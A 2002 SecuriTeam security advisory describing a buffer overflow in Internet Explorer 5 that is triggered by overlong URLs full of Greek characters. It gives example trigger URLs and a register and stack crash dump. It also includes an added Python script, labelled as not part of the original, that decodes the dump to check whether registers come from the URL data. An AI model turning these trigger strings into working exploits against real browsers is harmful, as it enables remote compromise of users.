[NT] MSIE URL Buffer Overflow using Greek Characters
From: support@securiteam.com
Date: 04/17/02
From: support@securiteam.com To: list@securiteam.com Date: Wed, 17 Apr 2002 12:11:08 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
MSIE URL Buffer Overflow using Greek Characters
------------------------------------------------------------------------
SUMMARY
A security vulnerability has been found in Internet Explorer that allows
remote attackers to overflow internal buffers used by the program, allowing
them to overwrite CPU registers. This could be used to compromise a
remote client simply by redirecting the user to a malicious URL.
DETAILS
Vulnerable systems:
* Internet Explorer version 5.00
Example:
about:ααααααααααααααααααααααααα[2.041 GREEK CHARS]ββββββββββββββββββα
http://αααααααααααααααααααααααααααααβββββββββββ[2.041 GREEK CHARS]δααα
gopher://αααααααααααααααααα[2.041 GREEK CHARS]ααδδδδδδδδδδδδσσσσσσσεεε
When IE crashes, the following error will appear:
=========================================
IEXPLORE caused an invalid page fault in module BROWSEUI.DLL at
015f:710283c0.
Registers:
EAX=cececece CS=015f EIP=710283c0 EFLGS=00010282
EBX=00000000 SS=0167 ESP=0058a054 EBP=0058bce0
ECX=817364ec DS=0167 ESI=0058b8d0 FS=3897
EDX=00000000 ES=0167 EDI=00000000 GS=0000
Bytes at CS:EIP:
ff 70 08 ff 75 0c ff 15 a0 14 02 71 89 5d f8 8d
Stack dump:
cececece 00421464 00420858 00000000 00620061 0075006f 003a0074 00b100ce
00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce
=========================================
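For crash triage, the dump above can be decoded to check whether the faulting register holds bytes that came from the URL. The following is an added example, not part of the original advisory: the function names are hypothetical, and the reading of each 16-bit stack unit as one zero-extended input byte is an inference from the dump, not something the advisory states.

```python
# Added triage example: the values below are copied from the crash report above.
STACK_DUMP = """\
cececece 00421464 00420858 00000000 00620061 0075006f 003a0074 00b100ce
00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce
"""
EAX = 0xCECECECE
ECX = 0x817364EC


def dwords(dump):
    """Parse the hex DWORD columns of a Win9x-style stack dump."""
    return [int(tok, 16) for tok in dump.split()]


def wide_units(values):
    """Split little-endian DWORDs into 16-bit units in memory order."""
    units = []
    for v in values:
        units += [v & 0xFFFF, v >> 16]
    return units


def recover_url(dump, scheme="about:"):
    """Locate the wide-character scheme on the stack and return
    (scheme, payload_bytes), or None if it is not present."""
    units = wide_units(dwords(dump))
    marker = [ord(c) for c in scheme]
    for i in range(len(units) - len(marker) + 1):
        if units[i:i + len(marker)] == marker:
            tail = units[i + len(marker):]
            # Assumption: each unit is one input byte widened to 16 bits.
            if all(u <= 0xFF for u in tail):
                return scheme, bytes(tail)
    return None


def register_tainted(reg, payload):
    """True if every byte of the register value also occurs in the payload."""
    return all(b in payload for b in reg.to_bytes(4, "little"))


if __name__ == "__main__":
    scheme, payload = recover_url(STACK_DUMP)
    print(scheme, payload.hex(), payload.decode("utf-8"))
    print("EAX tainted:", register_tainted(EAX, payload))
    print("ECX tainted:", register_tainted(ECX, payload))
```

The recovered bytes are CE B1 pairs, the UTF-8 encoding of the Greek letter alpha, and EAX consists only of the lead byte CE, which is consistent with the register being filled from the URL data.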
ADDITIONAL INFORMATION
The information has been provided by MegaHz <admin@cyhackportal.com>.